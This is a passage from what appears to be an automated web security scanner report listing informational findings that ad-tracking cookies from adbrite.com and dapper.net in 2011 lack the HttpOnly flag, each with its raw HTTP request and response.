GIF89a.............!.......,...........D..;
17.60. http://admonkey.dapper.net/AdBriteUIDMonster  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admonkey.dapper.net
Path:   /AdBriteUIDMonster

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdBriteUIDMonster?redirect=http%3A%2F%2Fads.adbrite.com%2Fadserver%2Fvdi%2F779045%3Fd%3D%5BVISITORDATA%5D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: admonkey.dapper.net

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.64
Date: Mon, 02 May 2011 02:35:21 GMT
Connection: keep-alive
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Set-Cookie: uid=17610414499975294; Expires=Sat, 29-Oct-2011 02:35:21 GMT
Location: http://ads.adbrite.com/adserver/vdi/779045?d=17610414499975294
Content-Length: 0

17.61. http://ads.adbrite.com/adserver/behavioral-data/8201  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/8201?d=1031 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"; vsd=0@1@4dbd2e3d@www.britepic.com; fq="84fok%2C1uo0%7Clkigxp"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 01:56:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 03-May-2011 01:56:59 GMT
Set-Cookie: ut="1%3AHY1BDoMgEAD%2FsmcOLFRr%2FA0oVdMNFlAJuP69ttfJZOaEQ0F%2FwtuVvMYxQQ%2FDPHdTkOZgDDTtlZGlSCpFZPyUl%2FdsGHGrIgRd8y11OhIrxkYkckQ3sVte%2Bcmt1WKYqV1K%2B%2FA3HuVOvxoIsMZ7F5f%2FEK7rCw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 01:56:59 GMT
Set-Cookie: vsd=0@1@4dbe0f6b@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 01:56:59 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
17.62. http://ads.adbrite.com/adserver/behavioral-data/8204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8204

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/behavioral-data/8204?d=1000,2,3,4,500,93 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=ChQKBjY4Mjg2NRjdreS6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs%7Clkjpzx%7Clkjq00"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; ut="1%3ATc1LCoAgFEDRvbyxAz9B0G6MjNTSyn6i7j3LBk0PF26Ag0ITQAt%2F2rVz0IDTbJsjWcahvyKJOFaTxRg5RWv2Z9LvNrOU5mNfWOmn5rTjhUXhHAOClhsjVvmOIKUb"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:39:42 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3Abc9BDoMgEAXQu8zaBWDRxNtQhYrUoRW1NeLdK8UmJHX7%2Fp%2BfzAozg2oFI5eXHRoHFTiTjw9Pn%2FdWvT31xF96S0jmOlbmKVM12Z21xoOXyJ3Z23WL3DA%2B3kKkpyJEP9Q8RSdYI%2BKAjANh9qgqe3Kv%2BjPEfyzKOkHI4CoQ5aC%2Fb8K2fQA%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:39:42 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
17.63. http://ads.adbrite.com/adserver/vdi/682865  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjkKBjY4NDMzORijmeS6DiIpdXVpZD00ZDUwMzg0Yi00YjVlLTBmNjctOTE5YS03Mjc1NTg5YzBiODUKMAoGNzYyNzAxGJL7-s0TIiA0OTUyNkIxQjNGREQwM0ZCQzE0RERDNTAwODlCQzg1MAohCgY3NzkwNDUYp4v6zRMiETE3NjA4ODQzOTEzMTMyNTM0CjQKBjgwNjIwNRj10Pi3GCIkMzcyOGU3NGMtNzQ2MS0xMWUwLTkxODUtMDAyNTkwMDlhOWU0EAE; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs%7Clkjpzx"; rb="0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; ut="1%3ATc1LCoAgFEDRvbyxAz9B0G6MjNTSyn6i7j3LBk0PF26Ag0ITQAt%2F2rVz0IDTbJsjWcahvyKJOFaTxRg5RWv2Z9LvNrOU5mNfWOmn5rTjhUXhHAOClhsjVvmOIKUb"
Host: ads.adbrite.com

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:09:35 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRjqq-S6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:09:35 GMT
Set-Cookie: rb="0:682865:20838240:null:0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:09:35 GMT
Content-Length: 0

17.64. http://ads.adbrite.com/adserver/vdi/682865  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=ChQKBjY4Mjg2NRi5teS6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs%7Clkjpzx%7Clkjq01"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0"; ut="1%3Abc9NDoMgEAXgu8zaBWCpibehCorUoRVta8S7%2B4MmJHX7vTcvmQk%2BDPIJjBy%2Ftisd5OBM2r88fT9r9fPUE39rLSGJa1iWxkzVYFfWGg8eAzdmbRc1csN4X%2B1RRbboRM1jdIKVIgzIMLDNHlVlL%2B5Ve4X4j%2FesiBASeAhE2en9TZjnBQ%3D%3D"
Host: ads.adbrite.com

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:09:38 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRimxOS6DiIEbnVsbAo5CgY2ODQzMzkYo5nkug4iKXV1aWQ9NGQ1MDM4NGItNGI1ZS0wZjY3LTkxOWEtNzI3NTU4OWMwYjg1CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY9dD4txgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:09:38 GMT
Set-Cookie: ut="1%3Abc9NDoMgEAXgu8zaBWCpibehCorUoRVta8S7%2B4MmJHX7vTcvmQk%2BDPIJjBy%2Ftisd5OBM2r88fT9r9fPUE39rLSGJa1iWxkzVYFfWGg8eAzdmbRc1csO45ntUkS06sa9idIKVIgzIMLDNHlVlL%2B5Ve4X4j%2FesiBASeAhE2en9TZjnBQ%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:09:38 GMT
Content-Length: 0

17.65. http://ads.adbrite.com/adserver/vdi/684339  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/684339?d=uuid%3D4d50384b-4b5e-0f67-919a-7275589c0b85 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"
Host: ads.adbrite.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:37:27 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjkKBjY4NDMzORjps8q7DiIpdXVpZD00ZDUwMzg0Yi00YjVlLTBmNjctOTE5YS03Mjc1NTg5YzBiODUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:27 GMT
Set-Cookie: rb="0:684339:20838240:uuid=4d50384b-4b5e-0f67-919a-7275589c0b85:0"; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:27 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
17.66. http://ads.adbrite.com/adserver/vdi/711384  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/711384?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=4tv6lf&r=http%3A%2F%2Fa.triggit.com%2Fpxabcm%3Fabid%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"; vsd=0@2@4dbe0f3a@loadus.exelator.com

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:04:56 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://a.triggit.com/pxabcm?abid=MTY4MzYyMDQ5eDAuMDQ5IDEzMDMwODM0NTB4NTQ0NjY5MDY4
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBjlpurNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:04:56 GMT
Set-Cookie: ut="1%3AHY1LDoMgFADv8tYseNBS421AqZhSLJ9K0OfdS7qdmWRO2AWMJ7xsq1uaM4wwOTcskeudMPqlvEmQYVnkhISf9gyBNCGWg8Uoj9qjQSbfI7yz7K33nZhSN3qQMpJNzqu1qVvoeObfbokDA6NDsGn9D%2BG6fg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:04:56 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Mon, 02-May-2011 02:04:56 GMT
Content-Length: 0

17.67. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/762701?d=978972DFA063000D2C0E7A380BFA1DEC HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; b="%3A%3A12ggb%2C6e73"; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@2@4dbe115c@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 02 May 2011 02:21:42 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiu4KfOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Set-Cookie: ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:21:42 GMT
Set-Cookie: vsd=0@3@4dbe1536@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:21:42 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:21:42 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
17.68. http://ads.adbrite.com/adserver/vdi/779045  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail
